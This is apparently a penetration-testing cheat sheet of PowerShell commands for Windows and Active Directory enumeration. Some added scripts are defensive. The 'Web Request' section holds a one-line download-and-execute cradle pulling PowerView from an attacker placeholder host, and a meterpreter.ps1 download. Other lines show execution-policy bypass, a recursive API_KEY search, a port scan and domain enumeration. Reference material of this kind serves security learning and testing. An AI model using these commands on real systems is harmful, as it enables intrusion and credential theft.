killchain-compendium/Enumeration/Windows/Powershell.md


Powershell Usage

Get-Help

Get-Help Command-Name 
  • Show examples
Get-Help Command-Name -Examples
  • Get-Command lists all the cmdlets installed on the current computer.
Get-Command
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*

Passing Output via Pipe

  • A pipe passes whole objects, including their methods and properties.
Verb-Noun | Get-Member
Get-Command | Get-Member -MemberType Method

Creating Objects from Previous Cmdlets

Get-ChildItem | Select-Object -Property Mode, Name
  • -First x - gets the first x objects
  • -Last x - gets the last x objects
  • -Unique - shows only the unique objects
  • -Skip x - skips the first x objects

Filtering Objects

Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}

The second version uses the $_ automatic variable, which holds the current object as Where-Object iterates through every object passed to it.

  • Where -operator is one of the following:
  • -Match: matches the exact value of the property
  • -Contains: if any item in the property value is an exact match for the specified value
  • -EQ: if the property value is the same as the specified value
  • -GT: if the property value is greater than the specified value
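The four operators applied to one object stream, as an added example that is not part of the compendium. Get-Command output is used as sample data because it exists on every host, and the function name is our own; note that -Match is a regular-expression match, so the pattern below uses anchors rather than a literal name.

```powershell
# Added example (not from the compendium): each Where-Object operator on the
# same input, followed by the Select-Object / Sort-Object / Measure-Object
# shaping shown elsewhere on this page. Function name is an assumption.
function Get-OperatorDemo {
    $cmdlets = Get-Command -CommandType Cmdlet

    # -Match: regular-expression match, so '^' and '$' anchor the name
    $getItemFamily = $cmdlets | Where-Object { $_.Name -match '^Get-.*Item$' }

    # -EQ: exact (case-insensitive) equality on a scalar property
    $getChildItem = $cmdlets | Where-Object { $_.Name -eq 'Get-ChildItem' }

    # -Contains: does a collection-valued property hold this element?
    # Parameters.Keys is the list of parameter names the cmdlet accepts.
    $acceptPath = $cmdlets | Where-Object { $_.Parameters.Keys -contains 'Path' }

    # -GT: numeric comparison
    $manyParams = $cmdlets | Where-Object { $_.Parameters.Count -gt 30 }

    [pscustomobject]@{
        GetItemFamily   = ($getItemFamily | Select-Object -ExpandProperty Name | Sort-Object) -join ', '
        GetChildItem    = $getChildItem.Name
        AcceptPathCount = ($acceptPath | Measure-Object).Count
        Top5ByParams    = $manyParams |
                              Sort-Object { $_.Parameters.Count } -Descending |
                              Select-Object -First 5 -Property Name,
                                  @{ Name = 'ParamCount'; Expression = { $_.Parameters.Count } }
    }
}

Get-OperatorDemo | Format-List
```

The script-block form ({ $_.Name -match ... }) is used throughout because the -Property form cannot express a computed value such as $_.Parameters.Count.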

Out-Gridview

Pipe the output to a graphical window and filter it through the GUI.

whatever | Out-GridView

Sort Object

Verb-Noun | Sort-Object
Get-ChildItem | Sort-Object

Finding a File

Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
Get-HotFix | Format-list | findstr  <searchstring>
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
  • Find backup files
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErrorAction SilentlyContinue
  • Find file contents
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY

Showing File Content

Get-Content 'C:\Program Files\interesting-file.txt'
  • Indexing lines
(Get-Content -Path file.txt)[index]
  • Search
Select-String <filename> -Pattern <pattern>

Copy File Content

Copy-Item <sourcefile> <destfile>

Count Lines of Output

As an example, count all cmdlets on the system:

Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object 

Count Words

Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word

Checksum of File

Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
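Get-FileHash is most useful when a hash is kept and compared later. The following is an added example, not part of the compendium: it records a SHA256 baseline for a directory tree and diffs a later run against it, so added, removed and modified files stand out. Function names and the paths in the usage lines are assumptions; SHA256 is used instead of the MD5 shown above because MD5 is collision-prone.

```powershell
# Added example (not from the compendium). Function names are our own.
function New-HashBaseline {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$BaselineCsv
    )
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue |
        Get-FileHash -Algorithm SHA256 |
        Select-Object Path, Hash |
        Export-Csv -Path $BaselineCsv -NoTypeInformation
}

function Compare-HashBaseline {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$BaselineCsv
    )
    $old = Import-Csv -Path $BaselineCsv
    $new = Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue |
        Get-FileHash -Algorithm SHA256 |
        Select-Object Path, Hash

    # Comparing on both Path and Hash means a modified file appears twice:
    # once with its old hash ('<=') and once with its new hash ('=>').
    Compare-Object -ReferenceObject $old -DifferenceObject $new -Property Path, Hash |
        ForEach-Object {
            [pscustomobject]@{
                Path   = $_.Path
                Hash   = $_.Hash
                Change = if ($_.SideIndicator -eq '=>') { 'new or modified' } else { 'removed or previous version' }
            }
        }
}

# Usage (paths are assumptions):
# New-HashBaseline     -Path 'C:\Program Files\App' -BaselineCsv 'C:\Temp\app-baseline.csv'
# Compare-HashBaseline -Path 'C:\Program Files\App' -BaselineCsv 'C:\Temp\app-baseline.csv'
```

Compare-Object emits only differences by default, so an unchanged tree produces no output.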

Current Working Directory

Get-Location

File Metadata

ls | Format-List *

Web Request

Invoke-WebRequest -Uri 'http://<attacker-ip>' -OutFile <filename>
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
  • Webrequest and execute in one go
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"

Base64 Decode File

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))

Circumvent Execution-Policy

powershell -ExecutionPolicy Bypass -File .\<file>
Set-ExecutionPolicy Bypass -Scope Process

Enumeration

Users

Get-LocalUser
  • Password not required users
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
  • SID of users
Get-WmiObject win32_useraccount | Select name, sid
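The user checks above are more useful when combined into one review table. The following is an added example, not part of the compendium: it reports each local account with its SID, whether it sits in the local Administrators group, and any risk flags (no password required, password never expires, enabled but never used). It needs the Microsoft.PowerShell.LocalAccounts module (Windows PowerShell 5.1 / Windows 10 and later); the function name is our own.

```powershell
# Added example (not from the compendium). Function name is an assumption.
function Get-LocalAccountReview {
    # SIDs of Administrators members, as strings so they compare cleanly
    $adminSids = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
                 ForEach-Object { $_.SID.Value }

    Get-LocalUser | ForEach-Object {
        $flags = @()
        if (-not $_.PasswordRequired)                       { $flags += 'no password required' }
        # PasswordExpires is $null when the password is set to never expire
        if ($_.Enabled -and $null -eq $_.PasswordExpires)   { $flags += 'password never expires' }
        # LastLogon is $null when the account has never logged on
        if ($_.Enabled -and $null -eq $_.LastLogon)         { $flags += 'enabled but never logged on' }

        [pscustomobject]@{
            Name       = $_.Name
            SID        = $_.SID.Value
            Enabled    = $_.Enabled
            LocalAdmin = $adminSids -contains $_.SID.Value
            LastLogon  = $_.LastLogon
            Flags      = $flags -join '; '
        }
    }
}

# Everything worth a second look: flagged accounts and every local admin
Get-LocalAccountReview | Where-Object { $_.Flags -ne '' -or $_.LocalAdmin } | Format-Table -AutoSize
```

Disabled accounts are still listed (with Enabled = False) so that a no-password account that someone later re-enables is already on the record.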

Network intel

  • Connections
netstat -ano
  • IP Address
Get-NetIPAddress
  • Listening TCP Ports
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
  • TCP Port by number
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
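Get-NetTCPConnection shows ports but not what owns them. As an added example (not part of the compendium), the function below joins every listening TCP socket to its owning process via Get-Process and marks sockets bound to all interfaces; a second function narrows that to listeners whose binary lives outside %SystemRoot%, which is a review list rather than a verdict. Function names are our own.

```powershell
# Added example (not from the compendium). Function names are assumptions.
function Get-ListeningSocketOwner {
    Get-NetTCPConnection -State Listen | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            LocalAddress  = $_.LocalAddress
            LocalPort     = $_.LocalPort
            OwningPid     = $_.OwningProcess
            ProcessName   = if ($proc) { $proc.ProcessName } else { '<not found>' }
            # Path is $null for protected system processes unless the shell is elevated
            ProcessPath   = if ($proc) { $proc.Path } else { $null }
            # 0.0.0.0 / :: means reachable on every interface, not just loopback
            AllInterfaces = $_.LocalAddress -in @('0.0.0.0', '::')
        }
    } | Sort-Object LocalPort, LocalAddress
}

# Network-reachable listeners whose executable is not under the Windows directory.
# Legitimate third-party services land here too; treat hits as items to confirm.
function Get-ListeningSocketTriage {
    Get-ListeningSocketOwner | Where-Object {
        $_.AllInterfaces -and $_.ProcessPath -and $_.ProcessPath -notlike "$env:SystemRoot\*"
    }
}

Get-ListeningSocketOwner | Format-Table -AutoSize
Get-ListeningSocketTriage | Format-Table -AutoSize
```

Run from an elevated prompt if ProcessPath shows $null for most system services; otherwise those rows are dropped from the triage view because their path cannot be checked.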

Patch level and updates

Get-Hotfix
  • Find patch by HotFixID
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
wmic qfe get Caption,Description,HotFixID,InstalledOn

Drivers

driverquery

Processes

  • Start processes
Start-Process <process>
  • Running processes
Get-Process <process>

Scheduled tasks

schtasks /query /fo LIST /v
Get-ScheduledTaskInfo
  • Scheduled Tasks, by TaskName
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname

or

Get-ScheduledTask -TaskName taskname
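Filtering by name only helps when the task name is already known. The following is an added example, not part of the compendium: it expands every enabled task into one row per action, with the account it runs as, the executable and arguments, and the last/next run times from Get-ScheduledTaskInfo, so the full set can be reviewed in one table. The function name is our own.

```powershell
# Added example (not from the compendium). Function name is an assumption.
function Get-ScheduledTaskActionReport {
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        $info = $task | Get-ScheduledTaskInfo
        foreach ($action in $task.Actions) {
            [pscustomobject]@{
                TaskPath   = $task.TaskPath
                TaskName   = $task.TaskName
                Author     = $task.Author
                RunAs      = $task.Principal.UserId
                # Execute/Arguments are populated for Exec actions; COM-handler actions leave them empty
                Execute    = $action.Execute
                Arguments  = $action.Arguments
                LastRun    = $info.LastRunTime
                LastResult = $info.LastTaskResult
                NextRun    = $info.NextRunTime
            }
        }
    }
}

# Coarse review filter: actions whose executable is not expressed relative to the
# Windows directory. Tune the pattern to the host; it is a starting point, not a rule.
Get-ScheduledTaskActionReport |
    Where-Object { $_.Execute -and $_.Execute -notmatch 'windir|SystemRoot|\\Windows\\' } |
    Format-Table TaskPath, TaskName, RunAs, Execute, Arguments -AutoSize
```

The page's Where-Object -Property TaskName -Match form still works on this output, since TaskName is carried through on every row.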

Alternate Data Streams (ADS)

  • Show ADS
Get-Item -Path file.exe -Stream *
  • Open ADS
wmic process call create $(Resolve-Path file.exe:streamname)
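Checking one file at a time for streams does not scale. As an added example (not part of the compendium), the function below walks a directory tree and lists every stream other than the ordinary content stream (:$DATA) and the browser mark-of-the-web (Zone.Identifier), so unexpected streams can be reviewed. The function name and the default ignore list are our own choices.

```powershell
# Added example (not from the compendium). Function name is an assumption.
function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)][string]$Path,
        # ':$DATA' is the file's normal content; Zone.Identifier is written by browsers on download
        [string[]]$IgnoreStream = @(':$DATA', 'Zone.Identifier')
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -Stream * returns one object per stream with FileName, Stream and Length
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -notin $IgnoreStream } |
                Select-Object FileName, Stream, Length
        }
}

# Usage (path is an assumption):
Find-AlternateDataStream -Path "$env:USERPROFILE\Downloads" | Format-Table -AutoSize
```

A stream found this way can be inspected without running anything via Get-Content -LiteralPath <file> -Stream <streamname>; -LiteralPath is used throughout so file names containing [ or ] are not treated as wildcards.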

Export Output

  • Export as CSV
Get-Process <process> | Export-Csv <output.csv>

ACL

  • Owner of files
Get-ACL C:\

Port Scanner

for($i=1; $i -le 65535; $i++) { Test-NetConnection localhost -Port $i }

Ping Hosts

1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2.$_ | Select-String ttl}

Antivirus

sc query windefend
  • Service name unknown
sc queryex type= service

Using Powerview

Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
  • Enumerate Group Policy
Get-NetGPO
  • Trust relationship to other domains
Get-NetDomainTrust
  • User enumeration
Find-LocalAdminAccess
whoami /priv
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership

Services

List services that are set to start automatically at boot, split into those currently running and those currently stopped (the service object's property is Status, not State):

Get-Service | Where-Object {$_.Status -eq "Running" -and $_.StartType -eq "Automatic"}
Get-Service | Where-Object {$_.Status -eq "Stopped" -and $_.StartType -eq "Automatic"}